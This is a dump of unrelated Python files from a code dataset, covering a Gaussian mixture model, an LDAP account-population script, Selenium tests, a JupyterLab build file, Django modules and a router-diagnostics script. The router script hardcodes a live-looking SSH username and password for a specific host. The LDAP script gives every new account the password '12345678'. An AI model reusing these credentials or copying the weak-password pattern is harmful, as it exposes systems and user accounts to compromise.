MultiGauss(self.mu[k],self.sigma[k]).log_prob(X) )\r\n\r\n def likelihood_1d(self, x):\r\n L = 0.0\r\n for k in range(self.K):\r\n L += np.exp( np.log(self.pi[k]) + MultiGauss(self.mu[k],self.sigma[k]).log_prob(x) )\r\n\r\n return L\r\n","sub_path":"mu/mixture/gmm.py","file_name":"gmm.py","file_ext":"py","file_size_in_byte":4962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"566401232","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n#\n\n#\n# Stop cmake build if pn_i_xxx substitute functions aren't used for\n# the dangerous non-complying [v]snprintf family. A source of\n# painful bug-hunting.\n#\n# Each obj must be checked instead of just the dll since Visual Studio\n# sometimes inserts references to vsnprintf in DllMainCRTStartup,\n# causing false positives.\n#\n# bad: vsnprintf, __vsnprintf, _imp__vsnprintf, ..., same for snprintf\n# OK: vsnprintf_s, pn_i_vsnprintf\n#\n\nimport sys\nimport os\nimport subprocess\nimport glob\nimport re\n\ndef symcheck(objfile):\n\n symfile = objfile.replace('.obj', '.sym')\n cmd = ['dumpbin.exe', '/SYMBOLS', objfile, '/OUT:' + symfile]\n\n # /dev/null standin\n junk = open('junk', 'w')\n p = subprocess.Popen(cmd, stdout=junk)\n n = p.wait()\n if n != 0 :\n raise Exception(\"dumpbin call failure\")\n\n f = open(symfile, 'r')\n for line in f :\n m = re.search(r'UNDEF.*\\b([a-zA-Z_]*snprintf)\\b', line)\n if m :\n sym = m.group(1)\n if re.match(r'_*pni_v?snprintf', sym) is None :\n raise Exception('Unsafe use of C99 violating function in ' + objfile + ' : ' + sym)\n\ndef main():\n os.chdir(sys.argv[1])\n objs = glob.glob('*.obj')\n for obj in glob.glob('*.obj'):\n symcheck(obj)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"tools/cmake/Modules/WindowsC99SymbolCheck.py","file_name":"WindowsC99SymbolCheck.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"577025177","text":"import inspect\nimport logging\nimport os\n\nfrom selenium.webdriver.common.by import By\n\nfrom Configuration.Base import BaseClass\nfrom Pages import homepage\nfrom Utility import logger as cl, StatusReport as st\nfrom Utility.util import utilities\nfrom testlib import commontestlib\nfrom testlib.navigation import nav\nfrom selenium import webdriver\n\nclass TestCricbuzz(BaseClass):\n log = cl.customlogger(loglevel=logging.INFO)\n\n def test_cricbuzz(self):\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n clibs = commontestlib.commonlib(self.driver)\n self.log.info(\"Launch Crickbuzz web Application\")\n navigation.launch_App()\n title = hpage.homePageTitle()\n cricbuzz = \"Cricbuzz\"\n self.log.info(\"Titile is : %s \", title)\n self.log.info(\"Verify that lauched application title is \\'Cricbuzz\\'\")\n self.log.info(\"#####Cricbuzz Title Verification#####\")\n ver1 = False\n if cricbuzz in title:\n ver1 = True\n Ver.Verify_result(result=ver1, msg=\"Cricbuzz Title \")\n self.log.info(\"We have successfully launched cricbuzz\")\n\n self.log.info(\"#####Cricbuzz logo Verification#####\")\n clogo_type = hpage.get_logo_type()\n ver2 = False\n if clogo_type == \"image\":\n ver2 = True\n Ver.Verify_result(result=ver2, msg=\"Cricbuzz logo \")\n clibs.screenShot(\"Cricbuzz logo Verification\")\n\n\n def test_WomenRanking(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Women's Ranking page is displayed.######\")\n clibs.nav_Rankings()\n clibs.select_womenRankings()\n page_heading = self.driver.find_element(By.CSS_SELECTOR, \".cb-nav-main h1.cb-nav-hdr\")\n Ver.verify_text(expected_text=\"ICC Cricket Rankings - Women's Batting\", actual_text=page_heading.text,\n msg='Women Ranking page')\n\n def test_MenRanking(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Mens Ranking page is displayed.######\")\n clibs.nav_Rankings()\n clibs.select_mensRanking()\n\n page_heading = self.driver.find_element(By.CSS_SELECTOR, \".cb-nav-main h1.cb-nav-hdr\")\n Ver.verify_text(expected_text=\"ICC Cricket Rankings - Men's Batting\",actual_text=page_heading.text,msg='Mens Ranking page')\n\n def test_TopRanking_player(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n clibs.nav_Rankings()\n clibs.select_mensRanking()\n player_rank_dict = clibs.get_Rank_detail()\n for player,rank in player_rank_dict.items():\n if rank == \"1\":\n self.log.info(\"%s is the top ranking test player\", player)\n top_ranking_player = player\n break\n Ver.verify_text(expected_text=\"Joe Root\",actual_text=top_ranking_player, msg='Top Ranking Player')\n\n def test_playerranking(self):\n clibs = commontestlib.commonlib(self.driver)\n hpage = homepage.Cribuzz_home(self.driver)\n navigation = nav(self.driver)\n Ver = st.status()\n self.log.info(\"#####Verify that Rohit Sharma is in the top 5 best Test player list#####\")\n rank = hpage.get_player_Rank(\"Rohit Sharma\")\n Ver.verify_Num_Condition(10,rank,\"lt\", \"Rohit Sharma is in the top 5 best Test Day player list\")\n utilities.get_testcaseName()\n\n\n\n\n\n\n","sub_path":"Crickbuzz/tests/test_cricbuzz.py","file_name":"test_cricbuzz.py","file_ext":"py","file_size_in_byte":3805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"640876381","text":"import yaml\n\nif __name__ == \"__main__\":\n from dependences.sqlserver_manager import ConnectionManager\nelse:\n from app.ldif_from_database.dependences.sqlserver_manager import ConnectionManager\n\nimport os\nimport ldif\nimport unidecode\nimport ldap\nfrom ldap import modlist\n\nldap_server = ldap.initialize('ldap://10.6.143.50')\n\nadmin_password = os.getenv(\"LDAP_ADMIN_PASSWORD\")\n\nldap_server.simple_bind_s('cn=admin,dc=uh,dc=cu', admin_password)\n\n\nclass MyLDIF(ldif.LDIFParser):\n def __init__(self, input):\n ldif.LDIFParser.__init__(self,input)\n\n def handle(self,dn,entry):\n try:\n ldif = modlist.addModlist(entry)\n ldap_server.add_s(dn, ldif)\n except Exception:\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n worker = ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(ci=%s)(objectclass=%s))\" % (entry[\"ci\"][0].decode('utf8'), \"Trabajador\"))\n ldif = modlist.modifyModlist(worker[0][1], entry)\n ldap_server.modify_s(dn, ldif)\n \n\nclass LDIFFromSQLServer:\n \"\"\"Encapsulation for methods wich populate and modify the ldap server\n from a sql server database.\"\"\"\n\n def __init__(self, config_yml_path, firstUidNumber):\n \"\"\"Receives the path to the config file\"\"\"\n self.__uidNumber = firstUidNumber\n self.connection_handler = ConnectionManager(config_yml_path)\n with open(config_yml_path, 'r') as stream:\n try:\n config_obj = yaml.safe_load(stream)\n self.__workers_schema = config_obj[\"workers_schema\"]\n except yaml.YAMLError:\n perror('Error while parsing the config yml file in LDIFFromSQLServer!')\n\n def generate_ldif(self, restore=False, number_of_rows=0):\n \"\"\"Generates the ldif file from the database to populate the ldap\n for the first time overriding existing data.\n The optional second parameter defines wheter the database is restored or not.\n The third parameter is for testing and should be ignored.\"\"\"\n if restore:\n self.connection_handler.restore()\n cursor = self.connection_handler.execute_sql_query(\n 'SELECT No_CI, Nombre, Sexo, Apellido_1, Apellido_2, Desc_Cargo, Desc_Direccion '\n 'FROM ((Nomina_UH.dbo.Empleados_Gral e '\n 'INNER JOIN Nomina_UH.dbo.RH_Cargos g ON g.Id_Cargo = e.Id_Cargo) '\n 'INNER JOIN Nomina_UH.dbo.RH_Plantilla_Plazas p '\n 'ON g.Id_Cargo = p.Id_Cargo and e.Id_Direccion = p.Id_Direccion) '\n 'INNER JOIN Nomina_UH.dbo.RH_Plantilla r '\n 'ON r.Id_Direccion = p.Id_Direccion '\n 'GROUP BY No_CI, Nombre, Sexo, Apellido_1, Apellido_2, Desc_Cargo, Desc_Direccion')\n\n with open(\"./output/workers.ldif\", \"w+\") as f:\n row_number = 1\n uidNumber = self.__uidNumber\n # Limited count ?\n if number_of_rows > 0:\n rows_left = number_of_rows\n for row in cursor:\n self.__process_row(row, f, row_number, uidNumber)\n row_number += 1\n rows_left -= 1\n if rows_left == 0:\n break\n uidNumber+=1\n else:\n for row in cursor:\n self.__process_row(row, f, row_number, uidNumber)\n row_number += 1\n uidNumber+=1\n\n # populate ldap\n parser = MyLDIF(open('/api/app/ldif_from_database/output/workers.ldif', 'rb'))\n parser.parse()\n\n return uidNumber\n\n def generate_modify_population(self):\n \"\"\"Generates the ldif file from the database to modify\n the ldap keeping unmodified data untouched.\"\"\"\n raise NotImplementedError\n\n def __get_uid(self, name, last_name, second_last_name):\n name = unidecode.unidecode(name)\n last_name = unidecode.unidecode(last_name)\n second_last_name = unidecode.unidecode(second_last_name)\n\n name = name.split()[0].lower()\n last_name = last_name.split(' ')[0].lower()\n second_last_name = second_last_name.split(' ')[0].lower()\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n possible_uid = name + '.' + last_name\n\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n possible_uid = name + '.' +second_last_name\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n for i in range(1,1000):\n possible_uid = name + '.' +second_last_name +str(i)\n if len(ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(uid=%s)(objectclass=%s))\" % (possible_uid, \"Trabajador\"))):\n continue\n uid = possible_uid\n break\n else:\n uid = possible_uid\n else:\n uid = possible_uid\n\n return uid\n\n def __process_row(self, row, open_file, row_number, uidNumber):\n uid_to_use = ''\n basedn = \"ou=Trabajadores,dc=uh,dc=cu\"\n query_results = ldap_server.search_s(basedn, ldap.SCOPE_ONELEVEL, \"(&(ci=%s)(objectclass=%s))\" % (str(row[0]).strip(), \"Trabajador\"))\n # IF is there...\n email_to_use = ''\n if len(query_results):\n uid_to_use = query_results[0][1][\"uid\"][0].decode('utf8')\n try:\n email_to_use = query_results[0][1][\"Correo\"][0].decode('utf8')\n except Exception:\n pass\n\n else:\n uid_to_use = str(self.__get_uid(str(row[1]), str(row[3]), str(row[4])))\n\n open_file.write(\"# Entry %d: \\n\" % row_number)\n open_file.write(\"%s: %s\\n\" % ('dn','uid='+uid_to_use+',ou=Trabajadores,dc=uh,dc=cu'))\n for entry in self.__workers_schema:\n if type(entry[1]) == list:\n open_file.write(\"%s: %s\\n\" % (entry[0], ' '.join([str(row[x]) for x in entry[1]])))\n else:\n open_file.write(\"%s: %s\\n\" % (entry[0], str(row[entry[1]])))\n \n # Entries outside the database\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'Trabajador'))\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'posixAccount'))\n open_file.write(\"%s: %s\\n\" % ('objectclass', 'shadowAccount'))\n open_file.write(\"%s: %s\\n\" % ('uidNumber', move_first_ceros(str(row[0]).strip())))\n open_file.write(\"%s: %d\\n\" % ('gidNumber', 10000))\n open_file.write(\"%s: %s\\n\" % ('userPassword', '12345678'))\n open_file.write(\"%s: %s\\n\" % ('homeDirectory', '/home/'+uid_to_use+'/'))\n open_file.write(\"%s: %s\\n\" % ('uid', uid_to_use))\n if len(email_to_use):\n open_file.write(\"%s: %s\\n\" % ('correo', email_to_use))\n\n open_file.write(\"\\n\")\n pass\n\n\ndef perror(msg, exit_status=1):\n print(msg)\n exit(exit_status)\n\ndef move_first_ceros(ci):\n while ci[0] == '0':\n ci = ci[1:] + ci[0]\n return ci\n\nif __name__ == \"__main__\":\n handler = LDIFFromSQLServer(\"config.yml\", 5000)\n handler.generate_ldif(number_of_rows=11, restore=False)\n","sub_path":"apps/ldap_api/app/ldif_from_database/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185056413","text":"# change the URLs in `./repos.yml`\nimport os\nimport pathlib\nimport doit.tools\nimport json\nimport shutil\nimport sys\nimport subprocess\nfrom yaml import safe_load\n\nDOIT_CONFIG = {\n \"backend\": \"sqlite3\",\n \"verbosity\": 2,\n \"par_type\": \"thread\",\n}\n\nos.environ.update(\n NODE_OPTS=\"--max-old-space-size=4096\",\n PIP_DISABLE_PIP_VERSION_CHECK=\"1\",\n PIP_IGNORE_INSTALLED=\"1\",\n PIP_NO_BUILD_ISOLATION=\"1\",\n PIP_NO_DEPENDENCIES=\"1\",\n PYTHONIOENCODING=\"utf-8\",\n PYTHONUNBUFFERED=\"1\",\n)\n\nHERE = pathlib.Path(__file__).parent\n\n# don't pollute the global state\nLINKS = (HERE / \"repos/.yarn-links\").resolve()\nYARN = [\"yarn\", \"--link-folder\", LINKS]\nPIP = [\"python\", \"-m\", \"pip\"]\n\nLAB_APP_DIR = pathlib.Path(sys.prefix) / \"share/jupyter/lab\"\nLAB_APP_STATIC = LAB_APP_DIR / \"static\"\nLAB_APP_INDEX = LAB_APP_STATIC / \"index.html\"\n\nREPOS_YML = HERE / \"repos.yml\"\nREPOS = safe_load(REPOS_YML.read_text())[\"repos\"]\nPATHS = {name: HERE / \"repos\" / name for name in REPOS}\n\n\nMISSING_LUMINO_DOCS = [\n \"default-theme\",\n # TODO: https://github.com/jupyterlab/lumino/issues/154\n \"polling\",\n]\n\n\ndef task_lint():\n \"\"\"lint the source in _this_ repo\"\"\"\n all_py = [*HERE.glob(\"*.py\")]\n yield dict(\n name=\"py\",\n doc=\"apply python source formatting and basic checking\",\n file_dep=[*all_py],\n actions=[do(\"black\", *all_py), do(\"flake8\", \"--max-line-length=88\", *all_py)],\n )\n\n\n# add targets to the docstring to include in the dev build.\ndef task_clone():\n \"\"\"clone all the repos defined in `repos.yml`\"\"\"\n for name, spec in REPOS.items():\n path = PATHS[name]\n config = path / \".git/config\"\n head = path / \".git/HEAD\"\n\n yield dict(\n name=f\"{name}:init\",\n file_dep=[REPOS_YML],\n actions=[]\n if path.exists()\n else [\n (doit.tools.create_folder, [path]),\n do(\"git\", \"init\", \"-b\", \"work\", cwd=path),\n do(\"git\", \"remote\", \"add\", \"origin\", spec[\"origin\"], cwd=path),\n do(\"git\", \"config\", \"user.email\", \"a11y@jupyter.org\", cwd=path),\n do(\"git\", \"config\", \"advice.detachedHead\", \"false\", cwd=path),\n ],\n targets=[config],\n )\n\n refs = spec[\"refs\"]\n for i, ref in enumerate(refs):\n task_dep = []\n actions = [do(\"git\", \"fetch\", \"origin\", ref[\"ref\"], cwd=path)]\n commit = ref.get(\"commit\") or ref[\"ref\"]\n targets = []\n if i == 0:\n actions += [do(\"git\", \"checkout\", \"-f\", commit, cwd=path)]\n else:\n prev = refs[i - 1]\n task_dep += [f\"\"\"clone:{name}:fetch:{i-1}:{prev[\"ref\"]}\"\"\"]\n actions += [do(\"git\", \"merge\", \"--commit\", commit, cwd=path)]\n\n if i == len(refs) - 1:\n targets = [head]\n\n yield dict(\n name=f\"\"\"{name}:fetch:{i}:{ref[\"ref\"]}\"\"\",\n file_dep=[config],\n targets=targets,\n task_dep=task_dep,\n actions=actions,\n )\n\n\ndef task_setup():\n \"\"\"ensure a working build of repos\"\"\"\n for name, path in PATHS.items():\n head = path / \".git/HEAD\"\n pkg_json = path / \"package.json\"\n\n if pkg_json.exists():\n yield dict(\n name=f\"{name}:yarn:install\",\n file_dep=[pkg_json, head],\n actions=[do(*YARN, cwd=path)],\n targets=yarn_integrity(path),\n )\n\n setup_py = path / \"setup.py\"\n\n if setup_py.exists():\n py_deps = [head, setup_py] + (\n yarn_integrity(path) if pkg_json.exists() else []\n )\n yield dict(\n name=f\"{name}:pip:install\",\n file_dep=py_deps,\n actions=[\n do(*PIP, \"uninstall\", \"-y\", path.name, cwd=path),\n do(*PIP, \"install\", \"-e\", \".\", cwd=path),\n do(*PIP, \"check\"),\n ],\n )\n if path == PATHS.get(\"jupyterlab\"):\n yield dict(\n name=f\"server:{path.name}\",\n file_dep=py_deps,\n task_dep=[f\"setup:{name}:pip:install\"],\n actions=server_extensions(path),\n )\n\n if pkg_json.exists():\n yield dict(\n name=f\"{name}:yarn:build\",\n file_dep=yarn_integrity(path),\n actions=[do(*YARN, \"build\", cwd=path)],\n targets=list(path.glob(\"packages/*/lib/*.js\")),\n **(\n dict(task_dep=[f\"setup:{name}:pip:install\"])\n if setup_py.exists()\n else {}\n ),\n )\n\n\ndef task_link():\n \"\"\"link yarn packages across the repos\"\"\"\n # go to the direction and links the packages.\n lumino = PATHS.get(\"lumino\")\n lab = PATHS.get(\"jupyterlab\")\n\n if not (lumino and lab):\n return\n\n for pkg_json in lumino.glob(\"packages/*/package.json\"):\n pkg = pkg_json.parent\n pkg_data = json.loads(pkg_json.read_text(encoding=\"utf-8\"))\n pkg_name = pkg_data[\"name\"]\n out_link = LINKS / pkg_data[\"name\"] / \"package.json\"\n in_link = lab / f\"node_modules/{pkg_name}/package.json\"\n yield dict(\n name=pkg_name,\n file_dep=[*yarn_integrity(lumino), *yarn_integrity(lab), pkg_json],\n actions=[(doit.tools.create_folder, [LINKS]), do(*YARN, \"link\", cwd=pkg)],\n targets=[out_link],\n )\n\n yield dict(\n name=f\"lab:{pkg_name}\",\n uptodate=[\n doit.tools.config_changed(\n {\n pkg_name: (\n in_link.exists() and in_link.resolve() == pkg_json.resolve()\n )\n }\n )\n ],\n file_dep=[out_link],\n actions=[do(*YARN, \"link\", pkg_name, cwd=lab)],\n )\n\n\ndef task_app():\n \"\"\"rebuild apps with live modifications\"\"\"\n lab = PATHS.get(\"jupyterlab\")\n\n if lab:\n dev_mode = lab / \"dev_mode\"\n dev_static = dev_mode / \"static\"\n dev_index = dev_static / \"index.html\"\n\n yield dict(\n name=\"build\",\n doc=\"do a dev build of the current jupyterlab source\",\n file_dep=[\n *LINKS.glob(\"*/package.json\"),\n *LINKS.glob(\"*/*/package.json\"),\n *sum(\n [[*repo.glob(\"packages/*/lib/*.js\")] for repo in PATHS.values()],\n [],\n ),\n ],\n actions=[\n do(*YARN, \"clean\", cwd=dev_mode),\n do(*YARN, \"build:prod\", cwd=dev_mode),\n ],\n targets=[dev_index],\n )\n\n yield dict(\n name=\"deploy\",\n doc=\"deploy the build dev application to $PREFIX/share/jupyter/lab\",\n file_dep=[dev_index],\n actions=[\n lambda: [shutil.rmtree(LAB_APP_DIR, ignore_errors=True), None][-1],\n (doit.tools.create_folder, [LAB_APP_DIR]),\n lambda: [\n shutil.copytree(dev_mode / subdir, LAB_APP_DIR / subdir)\n for subdir in [\"static\", \"schemas\", \"templates\", \"themes\"]\n ]\n and None,\n ],\n targets=[LAB_APP_INDEX],\n )\n\n\ndef task_docs():\n \"\"\"build documentation\"\"\"\n for path in PATHS.values():\n if not path.exists():\n continue\n\n if path == PATHS.get(\"jupyterlab\"):\n tsdoc_index = path / \"docs/api/index.html\"\n yield dict(\n name=\"\"\"jupyterlab:html:typedoc\"\"\",\n doc=\"build JupyterLab TypeScript API docs\",\n file_dep=[*path.rglob(\"src/**/*.ts\"), path / \"package.json\"],\n actions=[do(*YARN, \"docs\", cwd=path)],\n targets=[tsdoc_index],\n )\n\n lab_docs = path / \"docs\"\n lab_docs_src = lab_docs / \"source\"\n conf_py = lab_docs_src / \"conf.py\"\n yield dict(\n name=\"jupyterlab:html:sphinx\",\n doc=\"build JupyterLab docs (with a sitemap)\",\n file_dep=[\n tsdoc_index,\n *lab_docs_src.rglob(\"*.rst\"),\n *lab_docs_src.rglob(\"*.css\"),\n *lab_docs_src.rglob(\"*.js\"),\n ],\n actions=[\n (patch_sphinx_sitemap, [conf_py]),\n do(\n \"sphinx-build\",\n \"-b\",\n \"html\",\n \"source\",\n \"build/html\",\n cwd=path / \"docs\",\n ),\n ],\n targets=[\n path / \"docs/build/html/.buildinfo\",\n path / \"docs/build/html/index.html\",\n path / \"docs/build/html/sitemap.xml\",\n ],\n )\n\n if path == PATHS.get(\"lumino\"):\n lm_pkgs = sorted([p.parent for p in path.glob(\"packages/*/package.json\")])\n lm_docs = [\n path / f\"docs/api/{p.name}/index.html\"\n for p in lm_pkgs\n if p.name not in MISSING_LUMINO_DOCS\n ]\n lm_index = path / \"docs/api/index.html\"\n yield dict(\n name=\"\"\"lumino:html:typedoc\"\"\",\n doc=\"build Lumino TypeScript API docs\",\n file_dep=[*path.rglob(\"packages/*/src/**/*.ts\"), path / \"package.json\"],\n targets=lm_docs,\n actions=[do(*YARN, \"docs\", cwd=path)],\n )\n\n lm_index_text = \"\\n\".join(\n [\n \"\"\"\n \n \n Lumino API Documentation\n

      Lumino API Documentation

        \n \"\"\",\n *[\n f\"\"\"\n
      • \n {p.name.title()}\n
      • \n \"\"\"\n for p in lm_pkgs\n if p.name not in MISSING_LUMINO_DOCS\n ],\n \"\"\"
      \"\"\",\n ]\n )\n\n yield dict(\n name=\"\"\"lumino:html:index\"\"\",\n doc=\"build lumino docs index\",\n file_dep=[*lm_docs],\n actions=[lambda: [lm_index.write_text(lm_index_text), None][-1]],\n targets=[lm_index],\n )\n\n\ndef task_start():\n \"\"\"start applications\"\"\"\n if \"jupyterlab\" in REPOS:\n yield dict(\n name=\"jupyterlab\",\n uptodate=[lambda: False],\n file_dep=[LAB_APP_INDEX],\n actions=[run_jupyterlab()],\n )\n\n\n# utilities\n\n\ndef do(*args, cwd=HERE, **kwargs):\n \"\"\"wrap a CmdAction for consistency\"\"\"\n return doit.tools.CmdAction(list(args), shell=False, cwd=str(pathlib.Path(cwd)))\n\n\ndef yarn_integrity(repo):\n \"\"\"get the file created after yarn install\"\"\"\n return [repo / \"node_modules/.yarn-integrity\"]\n\n\ndef server_extensions(repo):\n \"\"\"enable server( )extensions in a repo\"\"\"\n enable = [\"enable\", \"--py\", repo.name, \"--sys-prefix\"]\n apps = [\"serverextension\"], [\"server\", \"extension\"]\n return sum(\n [[do(\"jupyter\", *app, *enable), do(\"jupyter\", *app, \"list\")] for app in apps],\n [],\n )\n\n\ndef run_jupyterlab():\n \"\"\"start a jupyterlab application\"\"\"\n\n def jupyterlab():\n args = [\"jupyter\", \"lab\", \"--debug\", \"--no-browser\"]\n proc = subprocess.Popen(args, stdin=subprocess.PIPE)\n\n try:\n proc.wait()\n except KeyboardInterrupt:\n proc.terminate()\n proc.communicate(b\"y\\n\")\n\n proc.wait()\n return True\n\n return doit.tools.PythonInteractiveAction(jupyterlab)\n\n\ndef patch_sphinx_sitemap(conf_py):\n text = conf_py.read_text(encoding=\"utf-8\")\n patches = []\n\n if \"html_baseurl\" not in text:\n patches += [\"html_baseurl = 'https://localhost:8080/docs/'\"]\n\n if \"sphinx_sitemap\" not in text:\n patches += [\"extensions = ['sphinx_sitemap']\"]\n\n if patches:\n patches += [\"## patches added by @jupyterlab/accessibility\", *patches]\n conf_py.write_text(\"\\n\\n\".join([text, \"\", *patches, \"\"]), encoding=\"utf-8\")\n","sub_path":"dodo.py","file_name":"dodo.py","file_ext":"py","file_size_in_byte":12629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"319700891","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('new/', views.new_recipe, name='new_recipe'),\n path('purchases_index/', views.purchases_list, name='purchases_list'),\n path('download_txt/',\n views.download, name='download'),\n path('//edit/',\n views.recipe_edit, name='recipe_edit'),\n path('//delete/',\n views.recipe_delete, name='recipe_delete'),\n path('subscriptions//',\n views.subscriptions, name='subscriptions'),\n path('favorites//', views.favorites, name='favorites'),\n path('/', views.profile, name='profile'),\n path('//', views.recipe_view, name='recipe'),\n]\n","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"223807153","text":"import logging\n\nfrom django.utils.deprecation import MiddlewareMixin\nfrom django.utils.translation import get_language\nfrom .utils.analytics import get_client_id, report_view\n\nlogger = logging.getLogger(__name__)\n\n\nclass CompatibilityMetaMiddleware(MiddlewareMixin):\n def process_response(self, request, response):\n response['X-UA-Compatible'] = 'IE=edge;chrome=1'\n return response\n\n\nclass GoogleAnalytics(MiddlewareMixin):\n def process_request(self, request):\n client_id = get_client_id(request)\n path = request.path\n language = get_language()\n headers = request.META\n\n try:\n report_view(client_id, path=path, language=language, headers=headers)\n except Exception:\n logger.exception('Unable to update analytics')\n","sub_path":"{{cookiecutter.project_name}}/src/{{cookiecutter.project_module}}/core/middleware.py","file_name":"middleware.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"652477910","text":"import argparse\nimport getpass\nimport json\nimport os\nimport subprocess\nimport time\nimport sys\n\nfrom colorama import init, Fore, Style\nfrom napalm import get_network_driver\nfrom netmiko import ConnectHandler\n\ndebug = True\n\ntelco = ['vf','telefonica', '-dc']\n\ndef timeit(method):\n def timed(*args, **kw):\n ts = time.time()\n result = method(*args, **kw)\n te = time.time()\n if 'log_time' in kw:\n name = kw.get('log_name', method.__name__.upper())\n kw['log_time'][name] = int((te - ts) * 1000)\n else:\n pprint('ran for %2.2f ms' % ((te - ts) * 1000), 'info')\n return result\n\n return timed\n\n\ndef display_time(seconds, granularity=5):\n result = []\n intervals = (\n ('weeks', 604800),\n ('days', 86400),\n ('hours', 3600),\n ('minutes', 60),\n ('seconds', 1),\n )\n for name, count in intervals:\n value = seconds // count\n if value:\n seconds -= value * count\n if value == 1:\n name = name.rstrip('s')\n result.append(\"{} {}\".format(value, name))\n return ', '.join(result[:granularity])\n\n\ndef coloured(content, colour='blue'):\n if colour == 'green':\n return '{}{}{}{}'.format(Fore.GREEN, Style.BRIGHT, content, Style.RESET_ALL)\n elif colour == 'red':\n return '{}{}{}{}'.format(Fore.RED, Style.BRIGHT, content, Style.RESET_ALL)\n else:\n return '{}{}{}{}'.format(Fore.CYAN, Style.BRIGHT, content, Style.RESET_ALL)\n\n\ndef pprint(content, level=\"info\", debug_header=\"\"):\n if type(content) is dict:\n content = json.dumps(content, indent=3, sort_keys=True)\n if level == \"info\":\n print('[{}{}info{}] {}'.format(Fore.CYAN, Style.BRIGHT, Style.RESET_ALL, content))\n elif level == \"error\":\n print('\\n[{}{}error{}] {}'.format(Fore.RED, Style.BRIGHT, Style.RESET_ALL, content))\n elif level == \"output\":\n print('[{}{}output{}] {}'.format(Fore.GREEN, Style.BRIGHT, Style.RESET_ALL, content))\n elif level == \"debug\":\n print(\n '\\n[{}{}debug{}] {}\\n{}\\n[{}{}debug{}]\\n'.format(\n Fore.YELLOW, Style.BRIGHT, Style.RESET_ALL, debug_header, content, Fore.YELLOW,\n Style.BRIGHT, Style.RESET_ALL))\n else:\n print(content)\n\n\ndef run_shell(command):\n return subprocess.call(command)\n\ndef ssh_nsa(command):\n output = \"\"\n try:\n print (command)\n net_connect = ConnectHandler(device_type='linux', ip='163.185.18.93', username='omneswan', password='MujHe3!a')\n output = net_connect.send_command(command)\n net_connect.disconnect()\n except Exception as e:\n pprint(str(e), \"error\")\n return output\ndef ssh(ip, creds, command):\n output = \"\"\n try:\n net_connect = ConnectHandler(device_type='cisco_ios', ip=ip, username=creds[0], password=creds[1])\n output = net_connect.send_command(command)\n net_connect.disconnect()\n except Exception as e:\n pprint(str(e), \"error\")\n return output\n\ndef last_reach1(host, name, ipaddr, credent):\n ######THIS METHOD IS FOR LOGS FROM THE ACTIVE ROUTER######\n\n output = ssh(name, credent, 'show ip arp | i {}'.format(ipaddr))\n pprint('\\nshow ip arp | i ' + ipaddr + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'clear arp')\n pprint('\\nclear arp\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'ping {}'.format(host))\n pprint('\\nping ' + host + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'show ip arp | i {}'.format(ipaddr))\n pprint('\\nshow ip arp | i ' + ipaddr + '\\n\\n' + str(output), 'output')\n\n output = ssh(name, credent, 'show clock')\n pprint('\\nshow clock\\n\\n' + str(output), 'output')\n\n\ndef last_reach(host, name, ipaddr,number, credent):\n ######THIS METHOD IS FOR LAST REACH OF LAN DOWN######\n i = 0\n f = 0\n k = 0\n j = 0\n stop = 0\n switch = 0\n output = ssh(name, credent, 'show cdp neighbors')\n pprint('\\nshow cdp neighbors\\n\\n' + str(output), 'output')\n array = output.splitlines()\n\n for x in array:\n if host in x:\n num = i\n j = 1\n p = array[num + 1].split()\n newstr = str(p[0] + p[1])\n else:\n j = 0\n i = i + 1\n\n if j==1:\n output = ssh(name, credent, 'show int {}'.format(newstr))\n pprint('\\nshow int '+newstr+'\\n\\n' + str(output), 'output')\n output = ssh(name, credent, 'show run int {}'.format(newstr))\n 